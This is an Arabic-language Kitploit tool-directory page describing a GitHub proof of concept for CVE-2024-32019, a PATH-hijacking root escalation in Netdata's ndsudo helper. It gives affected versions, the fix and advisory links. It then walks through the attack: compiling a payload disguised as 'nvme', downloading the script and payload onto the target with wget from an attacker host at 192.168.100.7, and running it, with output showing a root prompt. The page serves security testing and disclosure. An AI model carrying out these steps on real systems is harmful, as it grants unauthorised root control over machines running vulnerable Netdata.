Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC — إثبات مفهوم لتصعيد الامتيازات في Netdata ndsudo | Kitploit
أدوات/GitHubGitHub/t1erno/cve-2024-32019-netdata-ndsudo-privilege-escalation-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubt1erno/cve-2024-32019-netdata-ndsudo-privilege-escalation-poc

CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC

إثبات مفهوم لتصعيد الامتيازات في Netdata ndsudo

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3منذ 11 أشهرلم تتم المراجعة بعد

CVE-2024-32019 Netdata ndsudo: إثبات تصعيد الامتيازات (PoC)

ملخص

CVE-2024-32019 هي ثغرة تصعيد امتيازات محلية في مساعد SUID الخاص بـ Netdata والمسمى ndsudo، والتي تتيح لمستخدم محلي تنفيذ برامج عشوائية بصلاحيات الجذر عبر مسار بحث غير موثوق (اختطاف PATH).

تظهر المشكلة لأن ndsudo يقيد أسماء الأوامر ولكنه يحلها باستخدام PATH الخاص بالمستدعي، مما يسمح للمستخدم بوضع ملف ثنائي خبيث في مقدمة PATH وجعل ndsudo ينفذه بصلاحيات الجذر.

تؤثر الثغرة على إصدارات Netdata Agent ≥ v1.45.0 و < v1.45.3، و ≥ v1.44.0-60 و < v1.45.0-169، وتبلغ درجة خطورتها 8.8 وفقًا لمعيار CVSS v3.1 (عالية).

يتمثل الإصلاح في الترقية إلى v1.45.3 أو v1.45.0-169؛ وتصنف الثغرة ضمن CWE-426 (مسار بحث غير موثوق).

الاستخدام

  1. قم بتجميع الحمولة أو اصنع واحدة خاصة بك
root@kitploit:~
gcc -static payload.c -o nvme -Wall -Werror -Wpedantic
  1. ارفع السكربت والحمولة إلى الجهاز المستهدف
root@kitploit:~
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/CVE-2024-32019.sh
--2025-09-10 23:49:01--  http://192.168.100.7:8000/CVE-2024-32019.sh
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 712 [application/x-sh]
Saving to: ‘CVE-2024-32019.sh’

CVE-2024-32019.sh                                    100%[==================================================>]     712  --.-KB/s    in 0s

2025-09-10 23:49:01 (57.1 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]

test@ubuntu:/tmp$ wget http://192.168.100.7:8000/nvme
--2025-09-10 23:49:10--  http://192.168.100.7:8000/nvme
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 832552 (813K) [application/octet-stream]
Saving to: ‘nvme’

nvme                                                 100%[==================================================>] 813.04K  1.98MB/s    in 0.4s

2025-09-10 23:49:11 (1.98 MB/s) - ‘nvme’ saved [832552/832552]
  1. نفّذ إثبات الاختراق (PoC)
root@kitploit:~
test@ubuntu:/tmp$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@ubuntu:/tmp#

المصادر:

  • https://www.rapid7.com/db/modules/exploit/linux/local/ndsudo_cve_2024_32019/
  • https://www.wiz.io/vulnerability-database/cve/cve-2024-32019
  • https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
تنزيل الأداة